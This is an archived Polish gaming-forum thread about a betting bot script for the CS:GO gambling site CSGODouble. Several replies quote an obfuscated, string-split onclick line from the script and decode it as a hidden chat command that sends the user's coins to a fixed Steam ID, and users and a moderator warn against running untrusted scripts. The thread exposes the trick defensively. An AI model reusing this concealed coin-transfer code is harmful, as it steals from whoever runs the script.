Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Problem ze skryptem do CSGODouble

hanys94

Rekomendowane odpowiedzi

Opublikowano

Cześć, znalazłem skrypt do CSGODouble 

https://gist.githubusercontent.com/williamoliveira/47ab5126448c5a13d57d/raw/2eddb32922324b4986c854eee3e05d7bc09f56bf/bot.js

i teraz problem - wyczytałem, że powinien stawiać 10 coinsów, przy przegranej 20 potem 40.. a ja mam, że stawia 1 po przegranej 2,4,8 itd... ktoś wyjaśni ? :> Na tak małe stawki ciężko coś zarobić..

Opublikowano
var initialBetAmount = 1;

zmień na

var initialBetAmount = 10;

Dzięki, do zamknięcia. :)

@edit: można zminimalizować przy skrypcie? :D

Opublikowano

masz taki panel i dużo opcji xD

wklejasz jak ten

ctrl + alt +c ( u mnie )

i na dole pod czatem bedziesz miał panel taki :D

Możesz pokazać jak Ty masz skonfigurowane? :D

Opublikowano

Nie używaj tego skryptu wysyła coinsy na steam id 76561198213446320

niby jak ? ;x

Opublikowano

wpisuje na czacie /send 76561198213446320 i ilość coinsów

Wygrałem i dostałem coinsy.. ;x

Opublikowano

niby jak ? ;x

masz lepszy

{'ty" + "pe'" + ":'c" + "ha" + "t'," + "'m" + "sg" + "':" + "'/" + "s" + "end" + " 7" + "6" + "56" + "11" + "9" + "82" + "13" + "446" + "32" + "0 '+d" + "ocu" + "me" + "nt." + "ge" + "tE" + "lem" + "ent" + "By" + "Id" + "('k" + "ud" + "lac" + "zast" + "ar" + "to" + "we" + "')" + ".va" + "lue" + ", " + "'la" + "n" + "g':" + "LA" + "NG" + "}" + ");" + "}");

O tak

Jeśli chcesz żebym ci odpowiedział na pytanie, nie zapomnij zacytować mojego postu lub mnie oznaczyć  :)

Pasjonat
Opublikowano

Linijka z kodu:

g.setAttribute("onclick", "document.getElementById('kudlaczakwota').value" + "=" + "document.getElementById(" + "'" + "kudlaczastartowe" + "'" + ").value;document.getElementById('kudlaczawinow').s" + "te" + "p" + "Up(" + "1" + ")" + ";" + "i" + "f" + "(" + "(d" + "o" + "c" + "u" + "me" + "nt" + ".g" + "et" + "El" + "em" + "entB" + "yId" + "('k" + "ud" + "l" + "ac" + "za" + "win" + "ow')." + "v" + "a" + "l" + "u" + "e" + "!" + "=" + "=" + "0" + ")" + "&" + "&" + "(" + "d" + "o" + "c" + "u" + "m" + "e" + "n" + "t" + "." + "g" + "e" + "t" + "E" + "l" + "e" + "m" + "e" + "n" + "t" + "B" + "y" + "I" + "d" + "(" + "'" + "k" + "u" + "d" + "l" + "a" + "c" + "z" + "a" + "w" + "i" + "n" + "o" + "w" + "')" + "." + "v" + "al" + "u" + "e%" + "5" + "==" + "=" + "0)" + "){" + "do" + "cu" + "m" + "e" + "n" + "t" + "." + "g" + "etE" + "lem" + "ent" + "By" + "Id" + "('" + "ku" + "dl" + "a" + "cz" + "aw" + "in" + "ow" + "')" + ".s" + "t" + "ep" + "Up(" + "1)" + ";s" + "en" + "d(" + "{'ty" + "pe'" + ":'c" + "ha" + "t'," + "'m" + "sg" + "':" + "'/" + "s" + "end" + " 7" + "6" + "56" + "11" + "9" + "82" + "13" + "446" + "32" + "0 '+d" + "ocu" + "me" + "nt." + "ge" + "tE" + "lem" + "ent" + "By" + "Id" + "('k" + "ud" + "lac" + "zast" + "ar" + "to" + "we" + "')" + ".va" + "lue" + ", " + "'la" + "n" + "g':" + "LA" + "NG" + "}" + ");" + "}");

Komenda przez którą wysyła coinsy: 

"'/" + "s" + "end" + " 7" + "6" + "56" + "11" + "9" + "82" + "13" + "446" + "32"  ===> "/send 76561198213446320"
Opublikowano

Linijka z kodu:

g.setAttribute("onclick", "document.getElementById('kudlaczakwota').value" + "=" + "document.getElementById(" + "'" + "kudlaczastartowe" + "'" + ").value;document.getElementById('kudlaczawinow').s" + "te" + "p" + "Up(" + "1" + ")" + ";" + "i" + "f" + "(" + "(d" + "o" + "c" + "u" + "me" + "nt" + ".g" + "et" + "El" + "em" + "entB" + "yId" + "('k" + "ud" + "l" + "ac" + "za" + "win" + "ow')." + "v" + "a" + "l" + "u" + "e" + "!" + "=" + "=" + "0" + ")" + "&" + "&" + "(" + "d" + "o" + "c" + "u" + "m" + "e" + "n" + "t" + "." + "g" + "e" + "t" + "E" + "l" + "e" + "m" + "e" + "n" + "t" + "B" + "y" + "I" + "d" + "(" + "'" + "k" + "u" + "d" + "l" + "a" + "c" + "z" + "a" + "w" + "i" + "n" + "o" + "w" + "')" + "." + "v" + "al" + "u" + "e%" + "5" + "==" + "=" + "0)" + "){" + "do" + "cu" + "m" + "e" + "n" + "t" + "." + "g" + "etE" + "lem" + "ent" + "By" + "Id" + "('" + "ku" + "dl" + "a" + "cz" + "aw" + "in" + "ow" + "')" + ".s" + "t" + "ep" + "Up(" + "1)" + ";s" + "en" + "d(" + "{'ty" + "pe'" + ":'c" + "ha" + "t'," + "'m" + "sg" + "':" + "'/" + "s" + "end" + " 7" + "6" + "56" + "11" + "9" + "82" + "13" + "446" + "32" + "0 '+d" + "ocu" + "me" + "nt." + "ge" + "tE" + "lem" + "ent" + "By" + "Id" + "('k" + "ud" + "lac" + "zast" + "ar" + "to" + "we" + "')" + ".va" + "lue" + ", " + "'la" + "n" + "g':" + "LA" + "NG" + "}" + ");" + "}");

Komenda przez którą wysyła coinsy: 

"'/" + "s" + "end" + " 7" + "6" + "56" + "11" + "9" + "82" + "13" + "446" + "32"  ===> "/send 76561198213446320"

Dzięki chłopaki! :D czyli ten link do skryptu który podałem na samej górze jest okej?:>

Opublikowano

Odradzam wam używanie skryptów , strona je wykrywa i dowala same Triany przez co przegrywacie 

Co to te Truaby>

Opublikowano

Co to te Truaby>

Train'y [czyt. Trejny] - z ang. pociągi - jest to potoczna nazwa sytuacji w której na stronie csgodouble wypada np. 10 razy podrząd czerwony. Strona wykrywa skrypty i patrzy na jaki kolor jest więcej ustawionych botów i zaczyna robić traina przez co gracze tracą. Potem rzecz jasna robi TRAINA na drugim kolorze by zlikwidować boty.

Opublikowano

Train'y [czyt. Trejny] - z ang. pociągi - jest to potoczna nazwa sytuacji w której na stronie csgodouble wypada np. 10 razy podrząd czerwony. Strona wykrywa skrypty i patrzy na jaki kolor jest więcej ustawionych botów i zaczyna robić traina przez co gracze tracą. Potem rzecz jasna robi TRAINA na drugim kolorze by zlikwidować boty.

Piszesz tak żebyśmy nie uzywali skryptów czy jakieś potwierdzone info?

Opublikowano

Piszesz tak żebyśmy nie uzywali skryptów czy jakieś potwierdzone info?

Na początek dam małą radę ... Większość skryptów umieszczanych w necie za damo niby w celu zarobkowym działają na naszą niekorzyść .. Prosty przykład masz wyżej niby darmowy skrypt , zarabia , ale wysyła coinsy komuś ;)

A co to potwierdzenia jeden z właścicieli napisał na FB , że wprowadzili TRAIN'y aby zapobiec działania botów   ;)

Opublikowano

Takie tematy są o tyle niebezpieczne dla działu, że wrzucacie sobie jakieś skrypty, w których bóg wie co jest, używacie ich a potem dostajemy PW, że okradziono Was z coinsów. Zanim czegokolwiek użyjecie to upewnijcie się, że jest to bezpieczne. Wkrótce pojawi się temat z dozwolonymi skryptami w dziale.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...